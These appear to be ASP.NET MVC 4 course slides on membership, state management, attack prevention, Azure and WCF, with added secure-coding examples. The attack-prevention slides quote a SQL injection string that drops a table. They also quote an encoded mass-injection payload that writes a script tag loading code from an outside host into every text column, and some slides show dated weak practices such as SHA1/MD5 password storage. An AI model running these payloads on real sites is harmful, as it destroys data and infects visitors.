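The login snippet above redirects to whatever ReturnUrl the query string carries, so the destination after sign-in is controlled by the link the user followed. An MVC 4 version that only follows URLs local to the application, as an added example (not the courseware's code); the controller, action, view and parameter names are assumptions.

```csharp
using System.Web.Mvc;
using WebMatrix.WebData; // WebSecurity (SimpleMembership)

[Authorize]
public class AccountController : Controller
{
    // GET: carry the originally requested URL through the login form.
    [AllowAnonymous]
    public ActionResult Login(string returnUrl)
    {
        ViewBag.ReturnUrl = returnUrl;
        return View();
    }

    // POST: validate credentials, then decide where the user may be sent.
    [HttpPost]
    [AllowAnonymous]
    [ValidateAntiForgeryToken]
    public ActionResult Login(string username, string password, string returnUrl)
    {
        if (!WebSecurity.Login(username, password))
        {
            // Same message for unknown user and wrong password.
            ModelState.AddModelError("", "The user name or password provided is incorrect.");
            ViewBag.ReturnUrl = returnUrl;
            return View();
        }
        return RedirectToLocal(returnUrl);
    }

    private ActionResult RedirectToLocal(string returnUrl)
    {
        // Url.IsLocalUrl accepts application-relative paths such as
        // "/Product/Detail/1" or "~/Account/Profile" and rejects null, empty,
        // absolute ("http://example.test/") and scheme-relative
        // ("//example.test/") values.
        if (Url.IsLocalUrl(returnUrl))
        {
            return Redirect(returnUrl);
        }
        // Anything else falls back to a fixed page inside the application.
        return RedirectToAction("Profile", "Account");
    }

    public ActionResult Profile()
    {
        return Content("Signed in as " + User.Identity.Name);
    }
}
```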
11. 13
ASP.NET Membership
Table Schemas
SqlMembershipProvider
Universal Providers
ASP.NET Membership
11. 14
ASP.NET MVC 4 Basic template
The Basic template has configuration in place to use
ASP.NET Membership with the Universal Providers
<profile defaultProvider="DefaultProfileProvider">
<providers>
<add name="DefaultProfileProvider" type="System.Web.Providers.DefaultProfileProvider, System.Web.Providers,
..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
</providers>
</profile>
<membership defaultProvider="DefaultMembershipProvider">
<providers>
<add name="DefaultMembershipProvider" type="System.Web.Providers.DefaultMembershipProvider,
System.Web.Providers, ..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection"
enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false"
requiresUniqueEmail="false" maxInvalidPasswordAttempts="5" minRequiredPasswordLength="6"
minRequiredNonalphanumericCharacters="0" passwordAttemptWindow="10" applicationName="/" />
</providers>
</membership>
<roleManager defaultProvider="DefaultRoleProvider">
<providers>
<add name="DefaultRoleProvider" type="System.Web.Providers.DefaultRoleProvider, System.Web.Providers, ...,
PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
</providers>
</roleManager>
<sessionState mode="InProc" customProvider="DefaultSessionProvider">
<providers>
<add name="DefaultSessionProvider" type="System.Web.Providers.DefaultSessionStateProvider,
System.Web.Providers, ..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" />
</providers>
</sessionState>
ASP.NET Membership
11. 15
ASP.NET MVC 4 Internet template
The Internet template uses
SimpleMembership
\Models\AccountModels.cs defines a user account
and includes annotations to define keys and such
\Filters\InitializeSimpleMembershipAttribute.cs
creates the membership database, then calls
WebSecurity.InitializeDatabaseConnection which
verifies that the underlying tables are in place
and marks initialization as complete (for the
application's lifetime)
\Controllers\AccountController.cs makes heavy
use of OAuthWebSecurity (for OAuth account
registration / login / management) and
WebSecurity (WebSecurity provides account
management services for ASP.NET MVC)
ASP.NET Membership
11. 16
WebSecurity Class (SimpleMembershipProvider)
CurrentUserName
Gets the user name for the current user
ChangePassword
Changes the password for the specified user
ConfirmAccount(String)
Confirms that an account is valid and activates the
account
CreateAccount
Creates a new membership account using the specified
user name and password and optionally lets you specify
that the user must explicitly confirm the account
CreateUserAndAccount
Creates a new user profile entry and a new membership
account
GeneratePasswordResetToken
Generates a password reset token that can be sent to a
user in email
Login/Logout
Logs the user in/out
RequireRoles
If the current user is not in all of the specified roles, sets
the HTTP status code to 401 (Unauthorized)
ResetPassword
Resets a password by using a password reset token
WebSecurity Class
http://msdn.microsoft.com/en-us/library/webmatrix.webdata.websecurity(v=vs.111).aspx
11. 17
ASP.NET Membership
Roles Class Methods
AddUserToRole
AddUserToRoles
AddUsersToRole
AddUsersToRoles
Adds user(s) to role(s)
CreateNewRole
Creates a new role
DeleteRole
Deletes an existing role
FindUsersInRole
Returns a collection of users in a role
GetAllRoles
Returns a collection of all roles that currently exist
GetRolesForUser
Returns a collection of roles for the current user
IsUserInRole
Returns true if the user is a member of a specified role
RemoveUserFromRole
RemoveUserFromRoles
RemoveUsersFromRole
RemoveUsersFromRoles
Removes user(s) from role(s)
11. 18
ASP.NET Membership
Membership Methods (SqlMembershipProvider)
CreateUser
Add a user to the database
DeleteUser
Delete a user from the database
FindUserByEmail
FindUserByName
Gets a collection of membership users for whom the email addresses contain the specified e-mail addresses
or user names to match
GeneratePassword
Creates a random password of the specified length
GetAllUsers
Returns a collection of all users in the database
GetNumberOfUsersOnline
Returns the number of users currently logged on
GetUser
Returns a MembershipUser object representing the
current logged-on user
GetUserByEmail
Gets a user name for which the e-mail address for the
user matches the specified email address
UpdateUser
Updates the database with any changed values
ValidateUser
Verifies that the user name and password are valid
using System.Web.Security;
if (Membership.ValidateUser("Fred", "secret"))
ASP.NET Membership
11. 19
Storing User Accounts in .Config
Credentials can be stored in the Web.config file as
Password formats: Clear text, MD5, or SHA1
<forms>
<credentials passwordFormat="SHA1">
<user name="Eric" password="07B7..."/>
<user name="Sam" password="5753..."/>
</credentials>
</forms>
Use the classes in System.Security.Cryptography
namespace to generate the hash
Or call the 2nd longest method in .NET
string passwordHashed =
FormsAuthentication.HashPasswordForStoringInConfigFile(pwd, "SHA1");
Longest is:
GetTextEffectCharacterIndexFromTextSourceCharacterIndex
11. 20
Impersonation
ASP.NET accesses resources using a specific account
Network Service (IIS 6.0), ApplicationPoolIdentity (IIS 7+)
The setting is configurable by
Explicitly define an identity to impersonate
Use IIS-authenticated account (browser user account unless
IIS enables anonymous then it will be IUSR_computername)
<identity impersonate="true" />
Or use a named account
<identity impersonate="true"
userName="DOMAIN\username"
password="password" />
WIF and ACS
11. 21
What are They?
What is Windows Identity Foundation?
WIF enables .NET developers to externalize identity logic from
their application, improving developer productivity, enhancing
application security, and enabling interoperability
What is Windows Azure Access Control Service?
ACS is a cloud-based service that provides an easy way to
authenticate and authorize users to gain access to your web
applications and services while allowing authentication and
authorization to be factored out of your code
WIF and ACS
11. 22
Types Used
IClaimsIdentity
Extends the IIdentity interface to incorporate functionality
needed to implement claims-based identity e.g. Claims property
ClaimTypes class and its static properties
Use the ClaimTypes class (not an enum!) to search for a
particular type of claim in a ClaimSet or to create a claim
ClaimTypes.DateOfBirth, ClaimTypes.Email, and so on
if (claim.ClaimType == ClaimTypes.NameIdentifier) {
    var identifier = claim.Value;
}
if (claim.ClaimType == "http://schemas.microsoft.com/...") {
    var provider = claim.Value;
}
Claim Class
http://msdn.microsoft.com/en-us/library/system.identitymodel.claims.claim.aspx
IClaimsIdentity Interface
http://msdn.microsoft.com/en-us/library/microsoft.identitymodel.claims.iclaimsidentity.aspx
Custom Security
11. 23
Using HttpModules
An HTTP module is an assembly that is called on every
request that is made to your application
Can examine incoming requests and take action, so can perform
custom authentication or other security checks
Compare to HTTP handlers which are only called for registered
file extensions
Might implement one for mixed security authentication
e.g. Windows user but custom role
Custom Security
11. 24
Implementing Custom SimpleProviders
You can customize the new simple membership
provider by extending two abstract classes
WebMatrix.WebData.ExtendedMembershipProvider, and the
standard System.Web.Security.RoleProvider which was moved
to the System.Web.ApplicationServices.dll assembly
LLBLGen generates one DAL that supports a dozen or more
database providers out-of-the-box
dotConnect for Oracle implements SimpleMembership
functionality as custom OracleExtendedMembershipProvider and
OracleExtendedRoleProvider classes
SimpleMembershipProvider in MVC4 for MySql, Oracle, and more with LLBLGen
http://www.mattjcowan.com/funcoding/2012/11/10/simplemembershipprovider-in-mvc4-for-mysql-oracle-and-more-with-llblgen/
SimpleMembership and SimpleRole Providers for Oracle in ASP.NET MVC 4 Application Tutorial
http://www.devart.com/dotconnect/oracle/articles/extendedmembership-tutorial.html
Custom Security
11. 25
ClaimsAuthorizationManager
.NET 4.5 ships with a claims-based authorization
infrastructure around the ClaimsAuthorizationManager
class
Claims-based authorization encourages you to have a clean
separation of business and authorization code and that's much
better than sprinkling role checks all over your code base
but the API is not very approachable, especially in the face of
modern application development like MVC or Web API
All the base APIs in .NET 4.5 allow using claims-based
authorization, you just have to write your own plumbing
Thinktecture.IdentityModel contains an authorization filter
called ClaimsAuthorizeAttribute to make the connection to
ClaimsAuthorizationManager (see link below for details)
Using Claims-based Authorization in MVC and Web API
http://leastprivilege.com/2012/10/26/using-claims-based-authorization-in-mvc-and-web-api/
Miscellaneous
11. 26
Passwords
A study to find the top 25 leaked passwords of 2012 has
revealed too many people are still using "password",
"123456" and "12345678" for their login credentials
The average Web user maintains 25 separate accounts
but uses just 6.5 passwords to protect them, according
to a landmark study (PDF) from 2007
A PC running a single AMD Radeon HD7970 GPU can try
on average an astounding 8.2 billion password
combinations each second
Why passwords have never been weaker and crackers have never been stronger
http://arstechnica.com/security/2012/08/passwords-under-assault/
How I became a password cracker
http://arstechnica.com/security/2013/03/how-i-became-a-password-cracker/
12. 1
Module 12
Building a Resilient ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Building a Resilient ASP.NET MVC 4 Web Applications
12. 2
Contents
Topic
Slide
Preventing Attacks
State Management
Exam Topic: Configure state management
Choose a state management mechanism (in-process and
out of process state management, ViewState)
Plan for scalability
Use cookies or local storage to maintain state
Apply configuration settings in web.config file
Implement sessionless state (for example, QueryString)
Exam Topic: Implement a secure site with ASP.NET
Use HTML encoding to prevent cross-site scripting attacks (ANTI-XSS Library)
Implement deferred validation and handle unvalidated requests, for example,
form, querystring, and URL
Prevent SQL injection attacks by parameterizing queries
Prevent cross-site request forgeries (XSRF)
Exam Topic: Manage data integrity
Apply encryption to application data
Apply encryption to the configuration sections of an application
Sign application data to prevent tampering
Preventing Attacks
12. 3
SQL Injection
Exploits of a Mom
http://xkcd.com/327/
Preventing Attacks
12. 4
SQL Injection
In which malicious code is inserted into strings that are
passed to an SQL database for parsing and execution
For example, this bad code reads a value posted from a web
form and concatenates it into a SQL statement
var city = Request.Form["ShipCity"];
var sql = "select * from OrdersTable where ShipCity = '" + city + "'";
A malicious user could enter the following in ShipCity textbox
Redmond'; drop table OrdersTable--
Reject the following characters: ' ; -- /* */ xp_
BUT much better to use parameters instead
SQL Injection
http://msdn.microsoft.com/en-us/library/ms161953.aspx
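The slide's ShipCity query, built both ways, as an added example that is not part of the original courseware. The NVarChar(40) column type and the class and method names are assumptions; no database connection is opened, the program only shows what each command would send.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

static class ShipCityQuery
{
    // The concatenating version from the slide: the posted value becomes
    // part of the SQL text that the server parses.
    public static SqlCommand BuildConcatenated(string city)
    {
        return new SqlCommand(
            "select * from OrdersTable where ShipCity = '" + city + "'");
    }

    // Parameterized version: the SQL text is a constant and the posted value
    // travels separately as a typed parameter, so it is never parsed as SQL.
    public static SqlCommand BuildParameterized(string city)
    {
        var cmd = new SqlCommand(
            "select * from OrdersTable where ShipCity = @city");
        // NVarChar(40) is an assumed column type and size for ShipCity.
        cmd.Parameters.Add("@city", SqlDbType.NVarChar, 40).Value = city;
        return cmd;
    }

    static void Describe(string label, SqlCommand cmd)
    {
        Console.WriteLine(label);
        Console.WriteLine("  SQL text: " + cmd.CommandText);
        foreach (SqlParameter p in cmd.Parameters)
        {
            Console.WriteLine("  {0} ({1}) = {2}",
                p.ParameterName, p.SqlDbType, p.Value);
        }
        Console.WriteLine("  SQL text contains 'drop table': " +
            (cmd.CommandText.IndexOf("drop table",
                StringComparison.OrdinalIgnoreCase) >= 0));
    }

    static void Main()
    {
        // The value from the slide, as it would arrive in Request.Form["ShipCity"].
        string posted = "Redmond'; drop table OrdersTable--";

        using (var concatenated = BuildConcatenated(posted))
        using (var parameterized = BuildParameterized(posted))
        {
            Describe("Concatenated:", concatenated);
            Describe("Parameterized:", parameterized);
        }
    }
}
```

To run the parameterized command for real, assign an open SqlConnection to its Connection property and call ExecuteReader as usual.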
12. 5
Preventing Attacks
What Does This Do?
script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x...%20AS%20NVARCHAR(4000));EXEC(@S);--
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script
src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
Encoded SQL Injection
SQL Injection
http://www.gutizz.com/encoded-sql-injection/
http://www.blackhatlibrary.net/SQL_injection
Preventing Attacks
12. 6
MVC's Anti-Forgery Token support
Writes a unique value to an HTTP-only cookie and then the same
value is written to the form
When the page is submitted, an error is raised if the cookie
value doesn't match the form value
This prevents cross site request forgeries, that is, a form from
another site that posts to your site in an attempt to submit
hidden content using an authenticated user's credentials
The feature doesn't prevent any other type of data forgery or
tampering based attacks
To use it perform two steps
1. Decorate the action method (or controller) with the
[ValidateAntiForgeryToken] attribute
2. Call the HtmlHelper method @Html.AntiForgeryToken() inside
the form in your view
Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVC's AntiForgeryToken() helper
http://blog.stevensanderson.com/2008/09/01/prevent-cross-site-request-forgery-csrf-using-aspnet-mvcs-antiforgerytoken-helper/
Preventing Attacks
12. 7
Requiring HTTPS
Use the RequireHttpsAttribute to prevent unsecured
HTTP requests from being sent to an action method
[RequireHttps] // applies to all actions in controller
public class SomeController : Controller
{
    [RequireHttps] // applies to this action only
    public ActionResult SomeAction()
    {
        return View();
    }
}
ASP.NET Development Server doesn't support HTTPS
Conditional compilation can help
#if !DEBUG
[RequireHttps] // applies to all actions in controller
#endif
public class SomeController : Controller
{
    // actions
}
ASP.NET MVC RequireHttps in Production Only
http://stackoverflow.com/questions/1639707/asp-net-mvc-requirehttps-in-production-only
State Management
12. 8
Reading and Writing Cookies
Check if a cookie exists and display it if it does
@if (Request.Cookies["lastVisit"] != null) {
@Request.Cookies["lastVisit"].Value
} else {
@:No cookie with last visit
}
Define the cookie for the next visit
Setting Expires makes the cookie persistent: it is stored in a file instead of in memory
Response.Cookies["lastVisit"].Value = DateTime.Now.ToString();
Response.Cookies["lastVisit"].Expires = DateTime.Now.AddDays(1);
State Management
12. 9
Controlling Cookie Scope
Cookie scope can prevent browser vulnerabilities from being
exploited by hackers to trick the browser into sending your
cookie to other web sites
Cookie scope can be
Limited to a specific folder using the Path property
Response.Cookies["lastVisit"].Path = "/Application1";
Expanded to any server in a domain using the Domain property
Response.Cookies["lastVisit"].Domain = "contoso.com";
State Management
12. 10
Storing Multiple Values in a Cookie
Maximum 4 KB per cookie, 20 cookies per site
Could store multiple values in a single cookie
Response.Cookies["info"]["firstName"] = "Tony";
Response.Cookies["info"]["border"] = "blue";
Response.Cookies["info"].Expires = DateTime.Now.AddDays(1);
(firstName=Tony) (border=blue)
Cookie data can be manually encrypted before being
stored
State Management
12. 11
Query Strings
Typical query string in URL
http://search.microsoft.com/results?mkt=en-US&q=hello+world
How to read the values
var s1 = Request.QueryString["mkt"];
var s2 = Request.QueryString["q"];
State Management
12. 12
Request Validation
ASP.NET validates requests for potentially dangerous
values (like JavaScript) automatically
Throws HttpRequestValidationException if it finds a problem
The algorithm it uses is not documented for obvious reasons
If you want to disable this feature for an action
[ValidateInput(false)] public ActionResult Edit()
You must also switch mode to the old 2.0 version
The default of 4.0 means it cannot be disabled!
<httpRuntime requestValidationMode="2.0" />
Any numeric value smaller than 4.0 (for example, 3.7, 2.9, or 2.0) is interpreted as 2.0
Any number larger than 4.0 is interpreted as 4.0
HttpRuntimeSection.RequestValidationMode Property
http://msdn.microsoft.com/en-us/library/system.web.configuration.httpruntimesection.requestvalidationmode(v=vs.110).aspx
State Management
12. 13
HttpRequest.Unvalidated
To disable request validation for a specific field in a
request (for example, for an input element or query
string value), read the item through Request.Unvalidated
var rawComment = Request.Unvalidated.Form["comment"];
If you disable request validation, you must manually
check the unvalidated user input for potentially
dangerous input
Request Validation in ASP.NET
http://msdn.microsoft.com/en-us/library/hh882339(v=vs.110).aspx
HttpRequest.Unvalidated Property
http://msdn.microsoft.com/en-us/library/system.web.unvalidatedrequestvalues.aspx
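One way to do the manual check on a value read through Request.Unvalidated, as an added example that is not part of the original courseware: HTML-encode everything, then re-enable only an allow-list of plain tags. The allow-list, the class name and the sample comments are assumptions; the samples are constructed.

```csharp
using System;
using System.Net;

static class CommentSanitizer
{
    // Tags this application chooses to let through (assumption). Everything
    // else, including these tags when they carry attributes, stays encoded.
    static readonly string[] AllowedTags = { "b", "i" };

    public static string ToSafeHtml(string rawComment)
    {
        if (rawComment == null) return string.Empty;

        // 1. Encode the whole value so that no markup survives.
        string encoded = WebUtility.HtmlEncode(rawComment);

        // 2. Re-enable only the exact, attribute-free forms of allowed tags.
        foreach (string tag in AllowedTags)
        {
            encoded = encoded
                .Replace("&lt;" + tag + "&gt;", "<" + tag + ">")
                .Replace("&lt;/" + tag + "&gt;", "</" + tag + ">");
        }
        return encoded;
    }

    static void Main()
    {
        // In a controller the raw value would come from:
        //   var rawComment = Request.Unvalidated.Form["comment"];
        // Constructed sample inputs:
        string[] samples =
        {
            "<b>Nice</b> post, <i>thanks</i>",
            "<script>alert(1)</script>",
            "<b onmouseover=\"x()\">hover</b>",
            "5 < 6 & \"quoted\"",
            "&lt;b&gt; typed literally by the user"
        };

        foreach (string raw in samples)
        {
            Console.WriteLine("raw : " + raw);
            Console.WriteLine("safe: " + ToSafeHtml(raw));
            Console.WriteLine();
        }
    }
}
```

Because the value is already encoded, the view must output it without encoding it a second time, for example with @Html.Raw.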
State Management
12. 14
Application State
Application state is shared and used to store
information that is not user-specific
An instance of the HttpApplicationState class
Lock to prevent another page from changing the
variable between the time that the process reads the
current value and the time it writes it
HttpContext.Application.Lock();
HttpContext.Application["PageRequestCount"] =
(int)(HttpContext.Application["PageRequestCount"]) + 1;
HttpContext.Application.UnLock();
Stays until explicitly removed or application ends
Better to use Cache which can adjust to low-memory conditions
State Management
12. 15
Responding to Application Events
Handle in a Global.asax file
Application_Start
Application is starting; use to initialize application variables
Application_End
Application is ending; use to free application resources
Application_Error
An unhandled error has occurred
Application_LogRequest
A request has been made; use to log information about requests
Other events include
PostLogRequest, BeginRequest, ResolveCacheRequest
State Management
12. 16
Configuring Cookieless Session State
A cookieless session enables ASP.NET to track sessions
using a query string in the URL instead of a cookie
<sessionState cookieless="true"
regenerateExpiredSessionId="true" />
Embedded after the slash following the application name
http://www.example.com/s(lit3py55t21...)/order
Cookieless (UseCookies is default; required for AJAX)
False or UseCookies: uses cookies
True or UseUri: uses URI
UseDeviceProfile: decides based on browser definition support
AutoDetect: equivalent to UseDeviceProfile; does not use
probing mechanism
12. 17
State Management
Responding to Session Events
Session_Start
Raised when a new session begins
Use to initialize session variables
Session_End
Raised when a session is abandoned or expires
but only when using InProc session mode
Use to free per-session resources
Default timeout is 20 minutes
To change it to five minutes
<sessionState timeout="5" />
Session.Timeout = 5;
12. 18
State Management
Choosing a Session State Mode
InProc (default)
Stores session state in the AppDomain of web site
Fastest mode and can store any type
StateServer
Stores session state in memory of a service called the ASP.NET
State Service; could be on same web server or another machine
Type must be serializable
SQLServer
Stores session state in a SQL Server database; session state must
be enabled on the database; type must be serializable
Slowest mode, but most recoverable
Custom, Off
<system.web>
  <sessionState mode="Off" />
</system.web>
12. 19
State Management
Configuring Session State Modes
Configure to use SQL Server
Session timeout in minutes
<sessionState mode="SQLServer" timeout="20"
sqlConnectionString="Data Source=.;Integrated Security=SSPI;"
sqlCommandTimeout="30" />
Command timeout in seconds
Enable session state support on a database using
aspnet_regsql.exe
Uses tempdb by default
-d <database> -ssadd: adds support
-d <database> -ssremove: removes support
Calls SQL script: InstallSqlState.sql
Note: this utility is also used to enable other features
State Management
12. 20
Configuring Session State Modes
Configure to use State Server
<sessionState mode="StateServer"
stateConnectionString="tcpip=127.0.0.1:42424"
stateNetworkTimeout="10" />
The ASP.NET State Service must be running
Listens on port 42424
12. 21
State Management
Other Session State Configuration Options
Rename cookie for extra safety; security via obscurity
<sessionState cookieName="ASP.NET_SessionId" />
Dynamically return connection strings when you have
multiple database servers
<sessionState partitionResolverType="type" />
Log on to the session state SQL Server by using the host
identity (ApplicationPoolIdentity in IIS 7+)
<sessionState useHostingIdentity="true" />
Or a specified identity
<identity impersonate="true"
  userName="..." password="..." />
12. 22
State Management
Design Choices
Technology | PROs | CONs
Cookie | Scalable, stored on browser | Can be disabled, insecure
QueryString | Scalable across multiple servers, supported by all browsers | Insecure, very limited size
ViewState | Automatic, Web Forms only | Bulky pages, messy, evil
Session | Option for web farms and recoverable storage | Can be difficult to scale
Application | Simple | Stays until removed
Cache | Automatic removal, expirations, dependencies, priorities | In-memory only
TempData | Simple, automatically gets removed when read, can last beyond current request | Uses session state, MVC only
ViewData, ViewBag | Simple | Only lasts for active request, MVC only
ASP.NET State Management Recommendations
http://msdn.microsoft.com/en-us/library/z1hkazw7(v=vs.100).aspx
State Management
12. 23
machineKey Element
Controls tamper proofing and encryption of ViewState,
forms authentication tickets, and role cookies
For a single server the defaults are sufficient, but in a web farm
you must manually configure all servers to use the same keys
<machineKey
  validationKey="AutoGenerate,IsolateApps" [String]
  decryptionKey="AutoGenerate,IsolateApps" [String]
  validation="HMACSHA256" [SHA1 | MD5 | 3DES | AES | HMACSHA256 |
    HMACSHA384 | HMACSHA512 | alg:algorithm_name]
  decryption="Auto" [Auto | DES | 3DES | AES | alg:algorithm_name]
/>
Use separate key values for each application, but duplicate
each application's keys across all servers in the farm
<machineKey
validationKey="32E35872597989D14CC1D5D9F5B1E94238D0EE32CF10AA2D2059533DF6035F4F"
decryptionKey="B179091DBB2389B996A526DE8BCD7ACFDBCAB04EF1D085481C61496F693DF5F4"
/>
machineKey Element (ASP.NET Settings Schema)
http://msdn.microsoft.com/en-us/library/vstudio/w8h3skw9(v=vs.100).aspx
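A small console tool for the web farm case above, as an added example that is not part of the original courseware: it generates fresh random keys for one application, so that no farm reuses key values copied from a slide or web page, and flags the auto-generated defaults. The class and method names and the chosen key lengths (64 bytes for validation, 32 bytes for AES decryption) are assumptions of this example.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;

static class MachineKeyTool
{
    // Hex-encodes byteCount bytes from the cryptographic random number generator.
    static string RandomHex(int byteCount)
    {
        var bytes = new byte[byteCount];
        using (var rng = new RNGCryptoServiceProvider())
        {
            rng.GetBytes(bytes);
        }
        var sb = new StringBuilder(byteCount * 2);
        foreach (byte b in bytes)
        {
            sb.Append(b.ToString("X2"));
        }
        return sb.ToString();
    }

    // Builds a machineKey element with explicit keys, to be copied to every
    // server in the farm for this one application.
    public static string NewMachineKeyElement()
    {
        return string.Format(
            "<machineKey{0}  validationKey=\"{1}\"{0}  decryptionKey=\"{2}\"{0}" +
            "  validation=\"HMACSHA256\" decryption=\"AES\" />",
            Environment.NewLine, RandomHex(64), RandomHex(32));
    }

    // Returns null when the value can be shared across a farm,
    // otherwise the reason it cannot.
    public static string FarmProblem(string attribute, string value)
    {
        if (value.StartsWith("AutoGenerate", StringComparison.OrdinalIgnoreCase))
        {
            return attribute + " is auto-generated, so each server gets a different key";
        }
        if (!Regex.IsMatch(value, "^([0-9A-Fa-f]{2})+$"))
        {
            return attribute + " is not a whole number of hex-encoded bytes";
        }
        return null;
    }

    static void Main()
    {
        // The default from the schema shown on the slide.
        string defaultValue = "AutoGenerate,IsolateApps";
        Console.WriteLine(FarmProblem("validationKey", defaultValue));
        Console.WriteLine(FarmProblem("decryptionKey", defaultValue));

        Console.WriteLine();
        Console.WriteLine(NewMachineKeyElement());
    }
}
```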
13. 1
Module 13
Using Windows Azure Web Services in
ASP.NET MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Using Windows Azure Web Services
13. 2
Contents
Exam Topic: Debug a Windows Azure application
Collect diagnostic information by using Windows Azure Diagnostics API
Implement on demand vs. scheduled
Choose log types, for example, event logs, performance counters, and crash dumps
Debug a Windows Azure application by using IntelliTrace and Remote Desktop
Protocol (RDP)
Exam Topic: Design and implement the Windows Azure role life cycle
Identify and implement Start, Run, and Stop events
Identify startup tasks (IIS configuration [app pool], registry
configuration, third-party tools)
Review 20480.C.Cross.Domain.Requests
13. 3
MOC Errata
Page 13-12
The MOC slide says
For the second reference (for the staging environment), it
should say
http://<guid>.cloudapp.net/<servicename>.svc
Windows Azure
13. 4
Install the Windows Azure SDK
Windows Azure
13. 5
Install the Windows Azure SDK
What gets installed:
Windows Azure
13. 6
Remote Desktop (RDP)
By using the Windows Azure SDK and Remote Desktop
Services, you can access Windows Azure roles and
virtual machines that are hosted by Windows Azure
Set up a certificate so that you can encrypt credentials
information
The certificates that you need for a remote desktop connection
are different from the certificates that you use for other
Windows Azure operations
The remote access certificate must have a private key which
should be exported as a PFX file
Using Remote Desktop with Windows Azure Roles
http://msdn.microsoft.com/en-us/library/windowsazure/gg443832.aspx
13. 7
Windows Azure
Startup Tasks
You can use startup tasks to perform operations before
a role starts
Operations that you might want to perform include installing a
component, registering COM components, setting registry keys,
or starting a long running process
Startup tasks are defined in the ServiceDefinition.csdef file
<Startup>
<Task commandLine="Startup.cmd"
executionContext="limited" taskType="simple" >
<Environment>
<Variable name="MyVersionNumber" value="1.0.0.0" />
</Environment>
</Task>
</Startup>
Run Startup Tasks in Windows Azure
http://msdn.microsoft.com/en-us/library/windowsazure/hh180155.aspx
13. 8
Windows Azure
RoleEntryPoint and RoleEnvironment Events
When you create Windows Azure projects each role will
have a WebRole.cs or WorkerRole.cs
Derives from RoleEntryPoint which has three methods you can
override: OnStart, OnStop, Run
Can handle events on RoleEnvironment class
Changed, Changing: if the configuration is changed
StatusCheck, Stopping
public class WebRole : RoleEntryPoint
{
    public override bool OnStart()
    {
        RoleEnvironment.Changing
            += RoleEnvironment_Changing;
        return base.OnStart();
    }

    void RoleEnvironment_Changing(
        object sender,
        RoleEnvironmentChangingEventArgs e)
    {
        Log(e.Changes); // Log is the application's own logging helper
        e.Cancel = true; // restart the role instance to apply the change
    }
}
Leveraging the RoleEntryPoint
http://brentdacodemonkey.wordpress.com/2011/09/24/leveraging-the-roleentrypoint-year-of-azure-week-12/
WCF Services
13. 9
Format of Returned Data
Before .NET 4 it defaults to XML but can be overridden
[OperationContract]
[WebGet(ResponseFormat = WebMessageFormat.Json)]
long Mod(long x, long y);
With .NET 4 you can set it automatically
<webHttpEndpoint>
  <standardEndpoint name="" helpEnabled="true"
    automaticFormatSelectionEnabled="true"/>
</webHttpEndpoint>
When enabled the WCF infrastructure will try to
determine the appropriate response format using
1. The value of the HTTP Accept header of the request
2. The content-type of the request
3. The default response format for the operation
WCF Services
13. 10
ChannelFactory / WebChannelFactory (1/2)
Channel factories can be used to dynamically create a
channel (i.e. proxy) if you do not have one
But you will need a reference to the assembly that defines the
contracts i.e. interfaces (this is why it's good to separate
interfaces from implementation)
WebChannelFactory automatically adds the WebHttpBehavior
and WebHttpBinding if they are missing to allow HTTP GETs
How to define an endpoint and proxy programmatically
Create an address that points to the service
var address = new EndpointAddress(
"http://localhost/MathSite/MathService.svc");
Create a binding
var binding = new WSHttpBinding();
13. 11
WCF Services
ChannelFactory / WebChannelFactory (2/2)
Create a ChannelFactory (proxy builder) for the service
contract (the interface IMath), binding and address
var cf = new ChannelFactory<IMath>(binding, address);
Use the channel factory to create a channel (proxy) for the
service and then call its methods
IMath mathService = cf.CreateChannel();
double s = mathService.Add(3, 39);
When finished, close the proxy and dispose of the factory
(mathService as IClientChannel).Close();
cf.Dispose();
13. 12
Data Contracts
Serializing Object References
DataContractSerializer serializes by value (default)
[DataMember] public Address BillTo = someAddress;
[DataMember] public Address ShipTo = someAddress;
<BillTo>contents of someAddress</BillTo>
<ShipTo>contents of someAddress</ShipTo>
To get the DataContractSerializer to preserve object
references (especially useful for circular references)
[DataContract(IsReference=true)]
public class Order
[DataContract(IsReference=true)]
public class Address
<BillTo id="1">contents of someAddress</BillTo>
<ShipTo ref="1" />
Interoperable Object References
http://msdn.microsoft.com/en-us/library/cc656708.aspx
DataContract Serializer and IsReference property
http://zamd.net/2008/05/20/datacontract-serializer-and-isreference-property/
Data Contracts
13. 13
Resource Description Framework (RDF)
RDF is a standard model for data interchange on the
Web
RDF has features that facilitate data merging even if the
underlying schemas differ, and it specifically supports the
evolution of schemas over time without requiring all the data
consumers to be changed
RDF extends the linking structure of the Web to use URIs to
name the relationship between things as well as the two ends of
the link
Resource Description Framework (RDF)
http://www.w3.org/RDF/
14. 1
Module 14
Implementing Web APIs in
ASP.NET MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
14. 2
MOC Errata
Page 14-10
The MOC says NoAction in multiple sentences
It should say NonAction
[NonAction]
public void DoSomething()
{
}
Exam Topic: none
14. 3
HTTP and REST
POST versus PUT
The actual function performed by the POST method is
determined by the server and POST is designed to allow a
uniform method to cover the following functions: [...]
Extending a database through an append operation
So POST can be used to insert and the server should respond
with 201 (Created), or POST can be used for any meaning
PUT: If the Request-URI refers to an already existing resource,
the enclosed entity SHOULD be considered as a modified version
